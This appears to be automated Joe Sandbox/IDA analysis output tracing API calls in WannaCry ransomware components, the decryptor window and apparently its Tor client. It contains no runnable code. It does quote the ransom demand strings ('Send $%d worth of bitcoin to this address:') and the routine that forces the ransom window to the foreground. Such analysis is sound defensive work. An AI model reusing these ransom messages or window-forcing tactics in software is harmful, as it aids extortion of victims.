    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
    • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
    • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
    • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #2379.MFC42(00000001), ref: 00407667
    • #2379.MFC42 ref: 00407692
      • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
      • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005), ref: 0040B638
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043), ref: 0040B651
      • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043), ref: 0040B660
      • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
      • Part of subcall function 0040B620: SetFocus.USER32(00000000), ref: 0040B66A
      • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000), ref: 0040B671
      • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
      • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
      • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
      • Part of subcall function 004076A0: sprintf.MSVCRT ref: 0040780E
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0040785B
      • Part of subcall function 004076A0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00407870
      • Part of subcall function 004076A0: #540.MFC42 ref: 00407876
      • Part of subcall function 004076A0: _ftol.MSVCRT ref: 004078AA
      • Part of subcall function 004076A0: #2818.MFC42(?,$%d,00000000), ref: 004078BE
      • Part of subcall function 004076A0: #2818.MFC42(?,Send $%d worth of bitcoin to this address:,00000000), ref: 004078D1
      • Part of subcall function 004076A0: #2818.MFC42(?,%.1f BTC,?,?), ref: 004078F5
      • Part of subcall function 004076A0: #2818.MFC42(?,Send %.1f BTC to this address:,?,?), ref: 00407909
      • Part of subcall function 004076A0: #3092.MFC42(00000402,?), ref: 0040791D
      • Part of subcall function 004076A0: #6199.MFC42(00000402,?), ref: 00407924
      • Part of subcall function 004076A0: InvalidateRect.USER32(?,00000000,00000001), ref: 0040795A
      • Part of subcall function 004076A0: #800.MFC42 ref: 0040799F
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd

    Executed Functions

    APIs
      • Part of subcall function 003F6BB0: VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003F6D3B
      • Part of subcall function 003F6BB0: VirtualProtect.KERNELBASE ref: 003F6D6C
    • SetUnhandledExceptionFilter.KERNEL32 ref: 001C1285
    • malloc.MSVCRT ref: 001C134A
    • strlen.MSVCRT ref: 001C136A
    • malloc.MSVCRT ref: 001C1375
    • memcpy.MSVCRT ref: 001C1391
    • _cexit.MSVCRT ref: 001C13FF
    • _amsg_exit.MSVCRT ref: 001C142B
    • _initterm.MSVCRT ref: 001C144D
    • exit.MSVCRT ref: 001C14AE
      • Part of subcall function 003F6F10: GetSystemTimeAsFileTime.KERNEL32 ref: 003F6F49
      • Part of subcall function 003F6F10: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F5A
      • Part of subcall function 003F6F10: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F62
      • Part of subcall function 003F6F10: GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F6A
      • Part of subcall function 003F6F10: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,001C14F2), ref: 003F6F79
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
    • abort.MSVCRT ref: 001EC6C4
    • abort.MSVCRT ref: 001EC703
    • abort.MSVCRT ref: 001EC742
      • Part of subcall function 00316F50: __stack_chk_fail.LIBSSP-0 ref: 00316FA6
      • Part of subcall function 001EAE16: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB1E9), ref: 001EAE92
      • Part of subcall function 001EAE16: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB1E9), ref: 001EAEC5
      • Part of subcall function 001EAECC: __stack_chk_fail.LIBSSP-0 ref: 001EAEF2
      • Part of subcall function 0031721B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00316FE0), ref: 0031724B
      • Part of subcall function 001F4130: abort.MSVCRT ref: 001F419F
      • Part of subcall function 001F4130: __stack_chk_fail.LIBSSP-0 ref: 001F43C1
    • abort.MSVCRT ref: 001EC9EF
    • connect.WS2_32 ref: 001ECA38
    • __stack_chk_fail.LIBSSP-0 ref: 001ECB59
      • Part of subcall function 0031910D: __stack_chk_fail.LIBSSP-0 ref: 00319194
      • Part of subcall function 0031919B: strerror.MSVCRT ref: 003191ED
      • Part of subcall function 0031919B: __stack_chk_fail.LIBSSP-0 ref: 003191FD
      • Part of subcall function 00316DE9: __stack_chk_fail.LIBSSP-0 ref: 00316E9A
      • Part of subcall function 001F33ED: __stack_chk_fail.LIBSSP-0 ref: 001F351A
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C19AF
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C1A60
      • Part of subcall function 001C1956: abort.MSVCRT ref: 001C1AA4
      • Part of subcall function 001C1956: event_new.LIBEVENT-2-0-5 ref: 001C1B0F
      • Part of subcall function 001C1956: event_new.LIBEVENT-2-0-5 ref: 001C1B47
      • Part of subcall function 001C1956: __stack_chk_fail.LIBSSP-0 ref: 001C1BD3
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 003138BE: free.MSVCRT ref: 0031395B
      • Part of subcall function 003138BE: __stack_chk_fail.LIBSSP-0 ref: 00313978
      • Part of subcall function 0031985E: __stack_chk_fail.LIBSSP-0 ref: 00319A18
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • ERR_load_crypto_strings.LIBEAY32 ref: 00335EC8
    • OPENSSL_add_all_algorithms_noconf.LIBEAY32 ref: 00335ECD
      • Part of subcall function 0033D6F1: CRYPTO_num_locks.LIBEAY32(?,?,?,?,?,?,-00000001,?,00335ED7), ref: 0033D702
      • Part of subcall function 0033D6F1: CRYPTO_set_locking_callback.LIBEAY32 ref: 0033D75B
      • Part of subcall function 0033D6F1: CRYPTO_THREADID_set_callback.LIBEAY32 ref: 0033D767
      • Part of subcall function 0033D6F1: __stack_chk_fail.LIBSSP-0 ref: 0033D77C
    • SSLeay_version.LIBEAY32 ref: 00335EE6
    • strcmp.MSVCRT ref: 00335F05
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 00335DD3: RAND_SSLeay.LIBEAY32 ref: 00335DE3
      • Part of subcall function 00335DD3: RAND_get_rand_method.LIBEAY32 ref: 00335DEB
      • Part of subcall function 00335DD3: RAND_set_rand_method.LIBEAY32(?,?,?,?,?,?,?,00335F89), ref: 00335E1F
      • Part of subcall function 00335DD3: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,00335F89), ref: 00335E3B
      • Part of subcall function 0033CC1C: RAND_poll.LIBEAY32 ref: 0033CC3A
      • Part of subcall function 0033CC1C: RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CC9E
      • Part of subcall function 0033CC1C: RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCCA
      • Part of subcall function 0033CC1C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCEB
      • Part of subcall function 00335E42: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,00335F9E), ref: 00335E9A
      • Part of subcall function 00345F8F: __stack_chk_fail.LIBSSP-0 ref: 00345FB0
      • Part of subcall function 00347322: __stack_chk_fail.LIBSSP-0 ref: 00347343
    • __stack_chk_fail.LIBSSP-0 ref: 00335FC3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • CRYPTO_num_locks.LIBEAY32(?,?,?,?,?,?,-00000001,?,00335ED7), ref: 0033D702
      • Part of subcall function 003211F6: abort.MSVCRT ref: 0032125C
      • Part of subcall function 003211F6: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00319B54), ref: 0032127B
      • Part of subcall function 00332920: __stack_chk_fail.LIBSSP-0 ref: 00332958
    • CRYPTO_set_locking_callback.LIBEAY32 ref: 0033D75B
    • CRYPTO_THREADID_set_callback.LIBEAY32 ref: 0033D767
    • __stack_chk_fail.LIBSSP-0 ref: 0033D77C
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • listen.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?,001EB46A), ref: 001EAF92
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001EB00E
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00343742
    • abort.MSVCRT ref: 00343781
    • abort.MSVCRT ref: 003437C0
    • free.MSVCRT ref: 00343D03
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003437FF
      • Part of subcall function 00321144: memset.MSVCRT ref: 0032117D
      • Part of subcall function 00321144: __stack_chk_fail.LIBSSP-0 ref: 00321190
      • Part of subcall function 003430C6: __stack_chk_fail.LIBSSP-0 ref: 00343125
    • inflateInit2_.ZLIB1 ref: 00343878
    • __stack_chk_fail.LIBSSP-0 ref: 00343D21
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
    • inflate.ZLIB1 ref: 0034392C
    • inflateEnd.ZLIB1 ref: 00343960
    • inflateInit2_.ZLIB1 ref: 003439C4
      • Part of subcall function 00343174: __stack_chk_fail.LIBSSP-0(00000000), ref: 003431C5
    • inflateEnd.ZLIB1 ref: 00343C1D
    • free.MSVCRT ref: 00343C39
      • Part of subcall function 00321282: abort.MSVCRT ref: 003212DB
      • Part of subcall function 00321282: realloc.MSVCRT ref: 003212FA
      • Part of subcall function 00321282: exit.MSVCRT ref: 0032133B
      • Part of subcall function 00321282: __stack_chk_fail.LIBSSP-0 ref: 0032134E
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • inflateEnd.ZLIB1 ref: 00343CBC
    • free.MSVCRT ref: 00343CD5
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • time.MSVCRT ref: 001DFF0D
    • abort.MSVCRT ref: 001DFF79
    • abort.MSVCRT ref: 001DFFB8
    • abort.MSVCRT ref: 001DFFFE
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 001E0149
    • abort.MSVCRT ref: 001E01AD
      • Part of subcall function 00322B81: __stack_chk_fail.LIBSSP-0 ref: 00322BBD
    • abort.MSVCRT ref: 001E02B3
      • Part of subcall function 00277B99: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,001E02F1), ref: 00277BF5
      • Part of subcall function 00277B99: __stack_chk_fail.LIBSSP-0 ref: 00277CC3
      • Part of subcall function 0031663E: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001DBB06), ref: 0031666A
      • Part of subcall function 001DC3A0: __stack_chk_fail.LIBSSP-0 ref: 001DC48E
      • Part of subcall function 0032DA95: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002564FC), ref: 0032DAE3
      • Part of subcall function 00211E58: __stack_chk_fail.LIBSSP-0 ref: 00211F04
      • Part of subcall function 00214518: __stack_chk_fail.LIBSSP-0 ref: 00214595
      • Part of subcall function 0032D28C: abort.MSVCRT ref: 0032D2DC
      • Part of subcall function 0032D28C: __stack_chk_fail.LIBSSP-0 ref: 0032D3BB
    • __stack_chk_fail.LIBSSP-0 ref: 001E0783
      • Part of subcall function 0032E04A: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0032E0EC), ref: 0032E0B0
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 001DCFB4: __stack_chk_fail.LIBSSP-0 ref: 001DCFE5
      • Part of subcall function 0021FE5F: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0029EDC3), ref: 0021FEAF
      • Part of subcall function 0021FE5F: __stack_chk_fail.LIBSSP-0 ref: 0021FED8
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • time.MSVCRT ref: 001E075C
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4826
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4871
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F48BC
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4AD9
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B41
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4B88
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4BDA
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D10
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4D63
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4DF6
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4E47
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4EF1
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F37
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4F96
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F4FE8
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5076
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F50CD
      • Part of subcall function 001F47D0: abort.MSVCRT ref: 001F5636
      • Part of subcall function 001F47D0: __stack_chk_fail.LIBSSP-0 ref: 001F565A
      • Part of subcall function 00214D23: time.MSVCRT ref: 00214D47
      • Part of subcall function 00214D23: abort.MSVCRT ref: 00214D96
      • Part of subcall function 00214D23: memset.MSVCRT ref: 00214DF9
      • Part of subcall function 00214D23: __stack_chk_fail.LIBSSP-0 ref: 0021504F
      • Part of subcall function 002494EF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00272F6B), ref: 0024951B
      • Part of subcall function 0024926C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,0023D2EF), ref: 00249352
      • Part of subcall function 001F5AFF: free.MSVCRT ref: 001F5C6C
      • Part of subcall function 001F5AFF: __stack_chk_fail.LIBSSP-0 ref: 001F5C84
      • Part of subcall function 0032D6AA: abort.MSVCRT ref: 0032D700
      • Part of subcall function 0032D6AA: abort.MSVCRT ref: 0032D73F
      • Part of subcall function 0032D6AA: memset.MSVCRT ref: 0032D75A
      • Part of subcall function 0032D6AA: __stack_chk_fail.LIBSSP-0 ref: 0032D7AA
      • Part of subcall function 0032D610: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,0032E2A6), ref: 0032D666
      • Part of subcall function 0032D610: memset.MSVCRT ref: 0032D681
      • Part of subcall function 0032D610: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,0032E2A6), ref: 0032D6A3
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 00326B85
      • Part of subcall function 003159C4: _open.MSVCRT ref: 00315A44
      • Part of subcall function 003159C4: __stack_chk_fail.LIBSSP-0 ref: 00315A5A
    • strerror.MSVCRT ref: 00326BFE
    • _close.MSVCRT ref: 00326C73
    • _close.MSVCRT ref: 00326CDE
      • Part of subcall function 0032107E: abort.MSVCRT ref: 003210D1
      • Part of subcall function 0032107E: malloc.MSVCRT ref: 003210E9
      • Part of subcall function 0032107E: exit.MSVCRT ref: 0032112A
      • Part of subcall function 0032107E: __stack_chk_fail.LIBSSP-0 ref: 0032113D
      • Part of subcall function 003256C9: _read.MSVCRT ref: 0032577A
      • Part of subcall function 003256C9: __stack_chk_fail.LIBSSP-0 ref: 003257B4
    • strerror.MSVCRT ref: 00326D57
    • free.MSVCRT ref: 00326D9F
    • _close.MSVCRT ref: 00326DB1
    • strchr.MSVCRT ref: 00326DED
      • Part of subcall function 00322124: strchr.MSVCRT ref: 0032215B
      • Part of subcall function 00322124: __stack_chk_fail.LIBSSP-0 ref: 0032219D
    • strlen.MSVCRT ref: 00326E4C
    • __stack_chk_fail.LIBSSP-0 ref: 00326F50
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • free.MSVCRT ref: 00326EEB
    • _close.MSVCRT ref: 00326EFD
    • _close.MSVCRT ref: 00326F1D
    • memcpy.MSVCRT ref: 00326F3D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • strcmp.MSVCRT ref: 001C7403
    • strcmp.MSVCRT ref: 001C741F
    • strcmp.MSVCRT ref: 001C7445
    • strcmp.MSVCRT ref: 001C7465
    • strcmp.MSVCRT ref: 001C7485
    • strcmp.MSVCRT ref: 001C74A1
    • strcmp.MSVCRT ref: 001C74BD
    • strcmp.MSVCRT ref: 001C74D9
    • strcmp.MSVCRT ref: 001C74F5
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E40F9
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4122
      • Part of subcall function 002E40B6: free.MSVCRT ref: 002E4145
      • Part of subcall function 002E40B6: __stack_chk_fail.LIBSSP-0 ref: 002E4167
    • __stack_chk_fail.LIBSSP-0 ref: 001C77A4
      • Part of subcall function 00314127: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 003141A3
      • Part of subcall function 00314127: _fileno.MSVCRT ref: 003141BF
      • Part of subcall function 00314127: free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 003141EF
      • Part of subcall function 00314127: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 00314244
      • Part of subcall function 00314127: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,001C7567), ref: 00314261
      • Part of subcall function 0021FAAB: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001CA76C), ref: 0021FB18
      • Part of subcall function 00343078: zlibVersion.ZLIB1 ref: 00343088
      • Part of subcall function 00343078: __stack_chk_fail.LIBSSP-0 ref: 00343098
      • Part of subcall function 00335D43: SSLeay_version.LIBEAY32 ref: 00335D63
      • Part of subcall function 00335D43: __stack_chk_fail.LIBSSP-0 ref: 00335D8B
      • Part of subcall function 003EC348: event_get_version.LIBEVENT-2-0-5 ref: 003EC358
      • Part of subcall function 003EC348: __stack_chk_fail.LIBSSP-0 ref: 003EC368
      • Part of subcall function 003188BE: memset.MSVCRT ref: 00318901
      • Part of subcall function 003188BE: __stack_chk_fail.LIBSSP-0 ref: 00318B19
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • strstr.MSVCRT ref: 001C761B
    • strstr.MSVCRT ref: 001C7635
      • Part of subcall function 00319204: WSAStartup.WS2_32 ref: 0031922D
      • Part of subcall function 00319204: __stack_chk_fail.LIBSSP-0 ref: 00319286
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 003EC173
    • event_config_new.LIBEVENT-2-0-5 ref: 003EC183
    • __stack_chk_fail.LIBSSP-0 ref: 003EC2A5
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
    • abort.MSVCRT ref: 003EC1C5
    • event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1D8
    • event_config_set_num_cpus_hint.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC1F5
    • event_config_set_flag.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC208
    • event_base_new_with_config.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC213
    • event_config_free.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC223
    • exit.MSVCRT ref: 003EC25C
      • Part of subcall function 003EC319: event_base_get_method.LIBEVENT-2-0-5 ref: 003EC331
      • Part of subcall function 003EC319: __stack_chk_fail.LIBSSP-0 ref: 003EC341
    • event_get_version.LIBEVENT-2-0-5(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00231ACE), ref: 003EC268
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855569787.003E5000.00000040.sdmp, Offset: 001C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    APIs
    • abort.MSVCRT ref: 002DE529
      • Part of subcall function 00334233: memset.MSVCRT ref: 00334279
      • Part of subcall function 00334233: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,002DE544), ref: 0033428C
      • Part of subcall function 00322710: abort.MSVCRT ref: 00322766
      • Part of subcall function 00322710: abort.MSVCRT ref: 003227B5
      • Part of subcall function 00322710: __stack_chk_fail.LIBSSP-0 ref: 0032281B
    • abort.MSVCRT ref: 002DE5BE
    • memchr.MSVCRT ref: 002DE5EE
      • Part of subcall function 00322918: __stack_chk_fail.LIBSSP-0 ref: 0032296C
      • Part of subcall function 00322414: strlen.MSVCRT ref: 0032243C
      • Part of subcall function 00322414: memcmp.MSVCRT ref: 00322476
      • Part of subcall function 00322414: __stack_chk_fail.LIBSSP-0 ref: 00322486
      • Part of subcall function 002DE31B: __stack_chk_fail.LIBSSP-0 ref: 002DE499
    • abort.MSVCRT ref: 002DECD7
    • memchr.MSVCRT ref: 002DED07
    • __stack_chk_fail.LIBSSP-0 ref: 002DF466
      • Part of subcall function 003223BF: strlen.MSVCRT ref: 003223E1
      • Part of subcall function 003223BF: strncmp.MSVCRT ref: 003223FD
      • Part of subcall function 003223BF: __stack_chk_fail.LIBSSP-0 ref: 0032240D
    • memchr.MSVCRT ref: 002DEDAC
      • Part of subcall function 003342F8: strlen.MSVCRT ref: 0033431A
      • Part of subcall function 003342F8: __stack_chk_fail.LIBSSP-0 ref: 00334343
      • Part of subcall function 002DDDB7: __stack_chk_fail.LIBSSP-0 ref: 002DDDF1
      • Part of subcall function 0033434A: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002DEE90), ref: 003343B0
      • Part of subcall function 0033434A: memcpy.MSVCRT ref: 00334405
      • Part of subcall function 0033434A: __stack_chk_fail.LIBSSP-0 ref: 00334423
      • Part of subcall function 002CF5C4: strlen.MSVCRT ref: 002CF5EC
      • Part of subcall function 002CF5C4: __stack_chk_fail.LIBSSP-0 ref: 002CF619
    • abort.MSVCRT ref: 002DEFAD
    • memchr.MSVCRT ref: 002DEFD7
      • Part of subcall function 00316005: __stack_chk_fail.LIBSSP-0 ref: 0031605E
    • strcmp.MSVCRT ref: 002DF193
    • strcmp.MSVCRT ref: 002DF262
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 00334024
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033407F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003340C1
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 0033411F
      • Part of subcall function 00333FC6: abort.MSVCRT ref: 003341E9
      • Part of subcall function 00333FC6: __stack_chk_fail.LIBSSP-0 ref: 0033422C
      • Part of subcall function 00331A54: memset.MSVCRT ref: 00331ADE
      • Part of subcall function 00331A54: abort.MSVCRT ref: 00331C29
      • Part of subcall function 00331A54: __stack_chk_fail.LIBSSP-0 ref: 00331C43
